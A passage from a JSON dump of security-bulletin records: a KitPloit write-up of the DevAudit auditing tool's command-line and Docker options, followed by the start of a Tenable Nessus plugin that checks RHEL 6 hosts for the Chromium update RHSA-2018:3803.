of a Bower package source. You must specify the location of the Bower ` packages.json ` file you wish to audit using the ` -f ` or ` --file ` option otherwise the current directory will be searched for this file. \n\n * ` composer ` Do a package audit of a Composer package source. You must specify the location of the Composer ` composer.json ` file you wish to audit using the ` -f ` or ` --file ` option otherwise the current directory will be searched for this file. \n\n * ` dpkg ` Do a package audit of the system dpkg package source on Debian Linux and derivatives. \n\n * ` rpm ` Do a package audit of the system RPM package source on RedHat Linux and derivatives. \n\n * ` yum ` Do a package audit of the system Yum package source on RedHat Linux and derivatives. \n\nFor every package source the following general audit options can be used: \n\n\n * ` -f --file ` Specify the location of the package manager configuration file if needed. The NuGet, Bower and Composer package sources require this option. \n\n * ` --list-packages ` Only list the packages in the package source scanned by DevAudit. \n\n * ` --list-artifacts ` Only list the artifacts found on OSS Index for packages scanned by DevAudit. \n\nPackage sources tagged [Experimental] are only available in the master branch of the source code and may have limited back-end OSS Index support. However you can always list the packages scanned and artifacts available on OSS Index using the ` list-packages ` and ` list-artifacts ` options. \n \n** Applications ** \n\n\n * ` aspnet ` Do an application audit on a ASP.NET application. The relevant options are: \n\n * ` -r --root-directory ` Specify the root directory of the application. This is just the top-level application directory that contains files like Global.asax and Web.config. \n * ` -b --application-binary ` Specify the application binary. The is the .NET assembly that contains the application's .NET bytecode. This file is usually a .DLL and located in the bin sub-folder of the ASP.NET application root directory. \n * ` -c --configuration-file ` or ` -o AppConfig=configuration-file ` Specifies the ASP.NET application configuration file. This file is usually named Web.config and located in the application root directory. You can override the default @Web.config value with this option. \n * ` -o AppDevMode=enabled ` Specifies that application development mode should be enabled for the audit. This mode can be used when auditing an application that is under development. Certain configuration rules that are tagged as disabled for AppDevMode (e.g running the application in ASP.NET debug mode) will not be enabled during the audit. \n * ` netfx ` Do an application audit on a .NET application. The relevant options are: \n\n * ` -r --root-directory ` Specify the root directory of the application. This is just the top-level application directory that contains files like App.config. \n * ` -b --application-binary ` Specify the application binary. The is the .NET assembly that contains the application's .NET bytecode. This file is usually a .DLL and located in the bin sub-folder of the ASP.NET application root directory. \n * ` -c --configuration-file ` or ` -o AppConfig=configuration-file ` Specifies the .NET application configuration file. This file is usually named App.config and located in the application root directory. You can override the default @App.config value with this option. \n * ` -o GendarmeRules=RuleLibrary ` Specifies that the [ Gendarme ](<http://www.mono-project.com/docs/tools+libraries/tools/gendarme/>) static analyzer should enabled for the audit with rules from the specified rules library used. For example: ` devaudit netfx -r /home/allisterb/vbot-debian/vbot.core -b @bin/Debug/vbot.core.dll --skip-packages-audit -o GendarmeRules=Gendarme.Rules.Naming ` will run the Gendarme static analyzer on the vbot.core.dll assembly using rules from Gendarme.Rules.Naming library. The complete list of rules libraries is (taken from the Gendarme wiki): \n * [ Gendarme.Rules.BadPractice ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.BadPractice%28git%29>)\n * [ Gendarme.Rules.Concurrency ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Concurrency%28git%29>)\n * [ Gendarme.Rules.Correctness ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Correctness%28git%29>)\n * [ Gendarme.Rules.Design ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Design%28git%29>)\n * [ Gendarme.Rules.Design.Generic ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Design.Generic%28git%29>)\n * [ Gendarme.Rules.Design.Linq ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Design.Linq%28git%29>)\n * [ Gendarme.Rules.Exceptions ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Exceptions%28git%29>)\n * [ Gendarme.Rules.Gendarme ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Gendarme%28git%29>)\n * [ Gendarme.Rules.Globalization ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Globalization%28git%29>)\n * [ Gendarme.Rules.Interoperability ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Interoperability%28git%29>)\n * [ Gendarme.Rules.Interoperability.Com ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Interoperability.Com%28git%29>)\n * [ Gendarme.Rules.Maintainability ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Maintainability%28git%29>)\n * [ Gendarme.Rules.NUnit ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.NUnit%28git%29>)\n * [ Gendarme.Rules.Naming ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Naming%28git%29>)\n * [ Gendarme.Rules.Performance ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Performance%28git%29>)\n * [ Gendarme.Rules.Portability ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Portability%28git%29>)\n * [ Gendarme.Rules.Security ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Security%28git%29>)\n * [ Gendarme.Rules.Security.Cas ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Security.Cas%28git%29>)\n * [ Gendarme.Rules.Serialization ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Serialization%28git%29>)\n * [ Gendarme.Rules.Smells ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Smells%28git%29>)\n * [ Gendarme.Rules.Ui ](<https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Ui%28git%29>)\n * ` drupal7 ` Do an application audit on a Drupal 7 application. \n\n * ` -r --root-directory ` Specify the root directory of the application. This is just the top-level directory of your Drupal 7 install. \n * ` drupal8 ` Do an application audit on a Drupal 8 application. \n\n * ` -r --root-directory ` Specify the root directory of the application. This is just the top-level directory of your Drupal 8 install. \nAll applications also support the following common options for auditing the application modules or plugins: \n\n\n * ` --list-packages ` Only list the application plugins or modules scanned by DevAudit. \n\n * ` --list-artifacts ` Only list the artifacts found on OSS Index for application plugins and modules scanned by DevAudit. \n\n * ` --skip-packages-audit ` Only do an appplication configuration or code analysis audit and skip the packages audit. \n\n \n** Application Servers ** \n\n\n * ` sshd ` Do an application server audit on an OpenSSH sshd-compatible server. \n\n * ` httpd ` Do an application server audit on an Apache httpd-compatible server. \n\n * ` mysql ` Do an application server audit on a MySQL-compatible server (like MariaDB or Oracle MySQL.) \n\n * ` nginx ` Do an application server audit on a Nginx server. \n\n * ` pgsql ` Do an application server audit on a PostgreSQL server. \n\nThis is an example [ command line ](<https://www.kitploit.com/search/label/Command%20Line>) for an application server audit: ` ./devaudit httpd -i httpd-2.2 -r /usr/local/apache2/ -c @conf/httpd.conf -b @bin/httpd ` which audits an Apache Httpd server running on a Docker container named httpd-2.2. \nThe following are audit options common to all application servers: \n\n\n * ` -r --root-directory ` Specifies the root directory of the server. This is just the top-level of your server filesystem and defaults to ` / ` unless you want a different server root. \n * ` -c --configuration-file ` Specifies the server configuration file. e.g in the above audit the Apache configuration file is located at ` /usr/local/apache2/conf/httpd.conf ` . If you don't specify the configuration file DevAudit will attempt to auto-detect the configuration file for the server selected. \n * ` -b --application-binary ` Specifies the server binary. e.g in the above audit the Apache binary is located at ` /usr/local/apache2/bin/httpd ` . If you don't specify the binary path DevAudit will attempt to auto-detect the server binary for the server selected. \nApplication servers also support the following common options for auditing the server modules or plugins: \n\n\n * ` --list-packages ` Only list the application plugins or modules scanned by DevAudit. \n\n * ` --list-artifacts ` Only list the artifacts found on OSS Index for application plugins and modules scanned by DevAudit. \n\n * ` --skip-packages-audit ` Only do a server configuration audit and skip the packages audit. \n\n \n** Environments ** \nThere are currently 5 audit environment supported: local, remote hosts over SSH, remote hosts over WinRM, Docker containers, and GitHub. Local environments are used by default when no other environment options are specified. \n \n** SSH ** \nThe SSH environment allows audits to be performed on any remote hosts accessible over SSH without requiring DevAudit to be installed on the remote host. SSH environments are cross-platform: you can connect to a Linux remote host from a Windows machine running DevAudit. An SSH environment is created by the following options: ` -s SERVER [--ssh-port PORT] -u USER [-k KEYFILE] [-p | --password-text PASSWORD] ` \n` -s SERVER ` Specifies the remote host or IP to connect to via SSH. \n` -u USER ` Specifies the user to login to the server with. \n` --ssh-port PORT ` Specifies the port on the remote host to connect to. The default is 22. \n` -k KEYFILE ` Specifies the OpenSSH compatible private key file to use to connect to the remote server. Currently only RSA or DSA keys in files in the PEM format are supported. \n` -p ` Provide a prompt with local echo disabled for interactive entry of the server password or key file passphrase. \n` --password-text PASSWORD ` Specify the user password or key file passphrase as plaintext on the command-line. Note that on Linux when your password contains special characters you should use enclose the text on the command-line using single-quotes like ` 'MyPa<ss' ` to avoid the shell interpreting the special characters. \n \n** WinRM ** \nThe WinRM environment allows audits to be performed on any remote Windows hosts accessible over WinRM without requiring DevAudit to be installed on the remote host. WinRM environments are currently only available on Windows machines running DevAudit. A WinRM environment is created by the following options: ` -w IP -u USER [-p | --password-text PASSWORD] ` \n` -w IP ` Specifies the remote IP to connect to via WinRM. \n` -u USER ` Specifies the user to login to the server with. \n` -p ` Provide a prompt with local echo disabled for interactive entry of the server password or key file passphrase. \n` --password-text PASSWORD ` Specify the server password or key file passphrase as plaintext on the command-line. \n \n** Docker ** \nThis section discusses how to ** audit ** Docker images using DevAudit installed on the local machine. For ** running ** DevAudit as a containerized Docker app see the section below on Docker Usage. \nA Docker audit environment is specified by the following option: ` -i CONTAINER_NAME | -i CONTAINER_ID ` \n` \n` \n\n\n[  ](<https://1.bp.blogspot.com/-9ey9CtYC3rE/XAXMPV7L4cI/AAAAAAAANes/0-l9qX2BzNYJBMGdxckF-AUsOCYdZgBDACLcBGAs/s1600/DevAudit_5.png>)\n\n \n[ ](<https://camo.githubusercontent.com/b6949bbe03ce1c80a2e5c00777469daa862f563f/68747470733a2f2f6c68332e676f6f676c6575736572636f6e74656e742e636f6d2f696434494245663235756776536a5a4f7846374b56593843446f574c4e6c626235647948513852367761627446704d6a7772566c5f45494a4e6e6f506f627a6f3255434a6a357667684f61633870684a32554b4c636971436c6a4231696f5551363832645254674f594f676b664c425a4c7278564d326c6348474a5837776e517079717957773d773930302d683435302d6e6f>) ` CONTAINER_(NAME|ID) ` Specifes the name or id of a running Docker container to connect to. The container must be already running as DevAudit does not know how to start the container with the name or the state you require. \n \n** GitHub ** \nThe GitHub audit environment allows audits to be performed directly on a GitHub project repository. A GitHub environment is created by the ` -g ` option: ` -g \"Owner=OWNER,Name=NAME,Branch=BRANCH\" ` \n` OWNER ` Specifies the owner of the project \n` NAME ` Specifies the name of the project \n` PATH ` Specifies the branch of the project to connect to \nYou can use the ` -r ` , ` -c ` , and ` -f ` options as usual to specify the path to file-system files and directories required for the audit. e.g the following commad: ` devaudit aspnet -g \"Owner=Dnnsoftware,Name=Dnn.Platforn,Branch=Release/9.0.2\" -r /Website [email protected] ` will do an ASP.NET audit on this repository [ https://github.com/dnnsoftware/Dnn.Platform/ ](<https://github.com/dnnsoftware/Dnn.Platform/>) using the ` /Website ` source folder as the root directory and the ` web.config ` file as the ASP.NET configuration file. Note that filenames are case-sensitive in most environments. \n \n\n\n[  ](<https://3.bp.blogspot.com/-tjC62LqAmQU/XAXMTxfPnUI/AAAAAAAANew/LlYCiigBQPIavl2MMQovG99rtINweVYbQCLcBGAs/s1600/DevAudit_6.png>)\n\n \n** Program Options ** \n` -n --non-interactive ` Run DevAudit in non-interactive mode with all interactive features and animations of the CLI disabled. This mode is necessary for running DevAudit in shell scripts for instance otherwise errors will occure when DevAudit attempts to use interactive console features. \n` -d --debug ` Run DevAudit in debug mode. This will print a variety of informational and diagnostic messages. This mode is used for troubleshooting DevAudit errors and bugs. \n \n** Docker Usage ** \nDevAudit also ships as a Docker containerized app which allows users on Linux to run DevAudit without the need to install Mono and build from source. To pull the DevAudit Docker image from Docker Hub: \n` docker pull ossindex/devaudit[:label] ` \nThe current images are about 131 MB compressed. By default the image labelled ` latest ` is pulled which is the most recent release of the program. An ` unstable ` image is also available which tracks the master branch of the source code. To run DevAudit as a containerized app: \n\n \n \n docker run -i -t ossindex/devaudit TARGET [ENVIRONMENT] | [OPTIONS]\n\nThe -i and -t Docker options are necessary for running DevAudit interactively. If you don't specify these options then you must run DevAudit in non-interactive mode by using the DevAudit option -n. \nYou must mount any directories on the Docker host machine that DevAudit needs to access on the DevAudit Docker container using the Docker -v option. If you mount your local root directory at a mount point named /hostroot on the Docker image then DevAudit can access files and directories on your local machine using the same local paths. For example: \n` docker run -i -t -v /:/hostroot:ro ossindex/devaudit netfx -r /home/allisterb/vbot-debian/vbot.core ` \nwill allow the DevAudit Docker container to audit the local directory /home/allisterb/vbot-debian/vbot.core. You _ must _ mount your local root in this way to audit _ other _ Docker containers from the DevAudit container e.g. \n` docker run -i -t -v /:/hostroot:ro ossindex/devaudit mysql -i myapp1 -r / -c /etc/my.cnf --skip-packages-audit ` \nwill run a MySQL audit on a Docker container named ` myapp1 ` from the ` ossindex/devaudit ` container. \nIf you do not need to mount your entire root directory then you can mount just the directory needed for the audit. For example: \n` docker run -i -t -v /home/allisterb/vbot-debian/vbot.core:/vbot:ro ossindex/devaudit netfx -r /vbot -b @bin/Debug/vbot.core.dll ` \nwill mount read-only the ` /home/allisterb/vbot-debian/vbot.core ` directory as ` /vbot ` on the DevAudit container which allows DevAudit to access it as the audit root directory for a netfx application audit at ` /vbot ` . \nIf you wish to use private key files on the local Docker host for an audit over SSH, you can mount your directory that contains the needed key file and then tell DevAudit to use that file path e.g. \n` docker -i -t -v /home/allisterb/.ssh:/ssh:ro run ossindex/devaudit dpkg -s localhost -u allisterb -p -k /ssh/mykey.key ` \nwill mount the directory containing key files at /ssh and allow the DevAudit container to use them. \nNote that it's currently not possible for the Docker container to audit operating system package sources like dpkg or rpm or application servers like OpenSSH sshd on the _ local _ Docker host without mounting your local root directory at ` /hostroot ` as described above. DevAudit must chroot into your local root directory from the Docker container when running executables like dpkg or server binaries like sshd and httpd. You must also mount your local root as described above to audit other Docker containers from the DevAudit container as DevAudit also needs to chroot into your local root to execute local Docker commands to communicate with your other containers. \nFor running audits over SSH from the DevAudit container it is not necessary to mount the local root at ` /hostroot ` . \n \n** Troubleshooting ** \nIf you encounter a bug or other issue with DevAudit there are a couple of things you can enable to help us resolve it: \n\n\n * Use the -d option to enable debugging output. Diagnostic information will be emitted during the audit run. \n * On Linux use the DEVAUDIT_TRACE variable to enable tracing program execution. The value of this variable must be in the format for [ Mono tracing ](<http://www.mono-project.com/docs/debug+profile/debug/#tracing-program-execution>) e.g you can set DEVAUDIT_TRACE=N:DevAudit.AuditLibrary to trace all the calls made to the audit library duing an audit. \n \n** Known Issues ** \n\n\n * On Windows you _ must _ use the ` -n --non-interactive ` program option when piping or redirecting program output to a file otherwise a crash will result. This behaviour may be changed in the future to make non-interactive mode the default. \n * There appears to be an issue using the Windows console app [ ConEmu ](<https://conemu.github.io/>) and the Cygwin builds of the OpenSSH client when SSHing into remote Linux hosts to run Mono apps. If you run DevAudit this way you may notice strange sequences appearing sometimes at the end of console output. You may also have problems during keyboard interactive entry like entering passwords for SSH audits where the wrong password appears to be sent. If you are having problems entering passwords for SSH audits using ConEmu when working remotely, try holding the backspace key for a second or two to clear the input buffer before entering your password. \n \n \n\n\n** [ Download DevAudit ](<https://github.com/OSSIndex/DevAudit>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-12-11T11:39:01", "title": "DevAudit - Open-source, Cross-Platform, Multi-Purpose Security Auditing Tool", "type": "kitploit", "enchantments": {}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-12-11T11:39:01", "toolHref": "https://github.com/OSSIndex/DevAudit", "id": "KITPLOIT:3767157894549846367", "href": "http://www.kitploit.com/2018/12/devaudit-open-source-cross-platform.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-12-12T03:46:03", "references": ["https://access.redhat.com/security/cve/cve-2018-18348", "https://access.redhat.com/security/cve/cve-2018-18357", "https://access.redhat.com/security/cve/cve-2018-18342", "https://access.redhat.com/security/cve/cve-2018-18354", "https://access.redhat.com/security/cve/cve-2018-18336", "https://access.redhat.com/security/cve/cve-2018-18344", "https://access.redhat.com/security/cve/cve-2018-18346", "https://access.redhat.com/security/cve/cve-2018-17480", "https://access.redhat.com/security/cve/cve-2018-18340", "https://access.redhat.com/security/cve/cve-2018-18349", "https://access.redhat.com/security/cve/cve-2018-18352", "https://access.redhat.com/security/cve/cve-2018-17481", "https://access.redhat.com/security/cve/cve-2018-18353", "https://access.redhat.com/security/cve/cve-2018-18335", "https://access.redhat.com/security/cve/cve-2018-18359", "https://access.redhat.com/errata/RHSA-2018:3803", "https://access.redhat.com/security/cve/cve-2018-18350", "https://access.redhat.com/security/cve/cve-2018-18338", "https://access.redhat.com/security/cve/cve-2018-18343", "https://access.redhat.com/security/cve/cve-2018-18347", "https://access.redhat.com/security/cve/cve-2018-18356", "https://access.redhat.com/security/cve/cve-2018-18351", "https://access.redhat.com/security/cve/cve-2018-18345", "https://access.redhat.com/security/cve/cve-2018-18358", "https://access.redhat.com/security/cve/cve-2018-18339", "https://access.redhat.com/security/cve/cve-2018-18341", "https://access.redhat.com/security/cve/cve-2018-18337", "https://access.redhat.com/security/cve/cve-2018-18355"], "pluginID": "119568", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 71.0.3578.80.\n\nSecurity Fix(es) :\n\n* chromium-browser: Out of bounds write in V8 (CVE-2018-17480)\n\n* chromium-browser: Use after frees in PDFium (CVE-2018-17481)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-18335)\n\n* chromium-browser: Use after free in PDFium (CVE-2018-18336)\n\n* chromium-browser: Use after free in Blink (CVE-2018-18337)\n\n* chromium-browser: Heap buffer overflow in Canvas (CVE-2018-18338)\n\n* chromium-browser: Use after free in WebAudio (CVE-2018-18339)\n\n* chromium-browser: Use after free in MediaRecorder (CVE-2018-18340)\n\n* chromium-browser: Heap buffer overflow in Blink (CVE-2018-18341)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2018-18342)\n\n* chromium-browser: Use after free in Skia (CVE-2018-18343)\n\n* chromium-browser: Inappropriate implementation in Extensions (CVE-2018-18344)\n\n* chromium-browser: Inappropriate implementation in Site Isolation (CVE-2018-18345)\n\n* chromium-browser: Incorrect security UI in Blink (CVE-2018-18346)\n\n* chromium-browser: Inappropriate implementation in Navigation (CVE-2018-18347)\n\n* chromium-browser: Inappropriate implementation in Omnibox (CVE-2018-18348)\n\n* chromium-browser: Insufficient policy enforcement in Blink (CVE-2018-18349)\n\n* chromium-browser: Insufficient policy enforcement in Blink (CVE-2018-18350)\n\n* chromium-browser: Insufficient policy enforcement in Navigation (CVE-2018-18351)\n\n* chromium-browser: Inappropriate implementation in Media (CVE-2018-18352)\n\n* chromium-browser: Inappropriate implementation in Network Authentication (CVE-2018-18353)\n\n* chromium-browser: Insufficient data validation in Shell Integration (CVE-2018-18354)\n\n* chromium-browser: Insufficient policy enforcement in URL Formatter (CVE-2018-18355)\n\n* chromium-browser: Use after free in Skia (CVE-2018-18356)\n\n* chromium-browser: Insufficient policy enforcement in URL Formatter (CVE-2018-18357)\n\n* chromium-browser: Insufficient policy enforcement in Proxy (CVE-2018-18358)\n\n* chromium-browser: Out of bounds read in V8 (CVE-2018-18359)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "edition": 1, "reporter": "Tenable", "published": "2018-12-11T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2018:3803)", "type": "nessus", "enchantments": {}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-18348", "CVE-2018-18354", "CVE-2018-18349", "CVE-2018-18355", "CVE-2018-18358", "CVE-2018-18346", "CVE-2018-18352", "CVE-2018-18347", "CVE-2018-18340", "CVE-2018-18339", "CVE-2018-18357", "CVE-2018-18337", "CVE-2018-17481", "CVE-2018-18351", "CVE-2018-18336", "CVE-2018-18343", "CVE-2018-18342", "CVE-2018-18344", "CVE-2018-18359", "CVE-2018-18335", "CVE-2018-17480", "CVE-2018-18338", "CVE-2018-18345", "CVE-2018-18353", "CVE-2018-18341", "CVE-2018-18356", "CVE-2018-18350"], "modified": "2018-12-11T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-3803.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119568", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3803. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119568);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/11 12:42:59\");\n\n script_cve_id(\"CVE-2018-17480\", \"CVE-2018-17481\", \"CVE-2018-18335\", \"CVE-2018-18336\", \"CVE-2018-18337\", \"CVE-2018-18338\", \"CVE-2018-18339\", \"CVE-2018-18340\", \"CVE-2018-18341\", \"CVE-2018-18342\", \"CVE-2018-18343\", \"CVE-2018-18344\", \"CVE-2018-18345\", \"CVE-2018-18346\", \"CVE-2018-18347\", \"CVE-2018-18348\", \"CVE-2018-18349\", \"CVE-2018-18350\", \"CVE-2018-18351\", \"CVE-2018-18352\", \"CVE-2018-18353\", \"CVE-2018-18354\", \"CVE-2018-18355\", \"CVE-2018-18356\", \"CVE-2018-18357\", \"CVE-2018-18358\", \"CVE-2018-18359\");\n script_xref(name:\"RHSA\", value:\"2018:3803\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2018:3803)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 71.0.3578.80.\n\nSecurity Fix(es) :\n\n* chromium-browser: Out of bounds write in V8 (CVE-2018-17480)\n\n* chromium-browser: Use after frees in PDFium (CVE-2018-17481)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-18335)\n\n* chromium-browser: Use after free in PDFium (CVE-2018-18336)\n\n* chromium-browser: Use after free in Blink (CVE-2018-18337)\n\n* chromium-browser: Heap buffer overflow in Canvas (CVE-2018-18338)\n\n* chromium-browser: Use after free in WebAudio (CVE-2018-18339)\n\n* chromium-browser: Use after free in MediaRecorder (CVE-2018-18340)\n\n* chromium-browser: Heap buffer overflow in Blink (CVE-2018-18341)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2018-18342)\n\n* chromium-browser: Use after free in Skia (CVE-2018-18343)\n\n* chromium-browser: Inappropriate implementation in Extensions\n(CVE-2018-18344)\n\n* chromium-browser: Inappropriate implementation in Site Isolation\n(CVE-2018-18345)\n\n* chromium-browser: Incorrect security UI in Blink (CVE-2018-18346)\n\n* chromium-browser: Inappropriate implementation in Navigation\n(CVE-2018-18347)\n\n* chromium-browser: Inappropriate implementation in Omnibox\n(CVE-2018-18348)\n\n* chromium-browser: Insufficient policy enforcement in Blink\n(CVE-2018-18349)\n\n* chromium-browser: Insufficient policy enforcement in Blink\n(CVE-2018-18350)\n\n* chromium-browser: Insufficient policy enforcement in Navigation\n(CVE-2018-18351)\n\n* chromium-browser: Inappropriate implementation in Media\n(CVE-2018-18352)\n\n* chromium-browser: Inappropriate implementation in Network\nAuthentication (CVE-2018-18353)\n\n* chromium-browser: Insufficient data validation in Shell Integration\n(CVE-2018-18354)\n\n* chromium-browser: Insufficient policy enforcement in URL Formatter\n(CVE-2018-18355)\n\n* chromium-browser: Use after free in Skia (CVE-2018-18356)\n\n* chromium-browser: Insufficient policy enforcement in URL Formatter\n(CVE-2018-18357)\n\n* chromium-browser: Insufficient policy enforcement in Proxy\n(CVE-2018-18358)\n\n* chromium-browser: Out of bounds read in V8 (CVE-2018-18359)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3803\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-17480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-17481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18359\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red 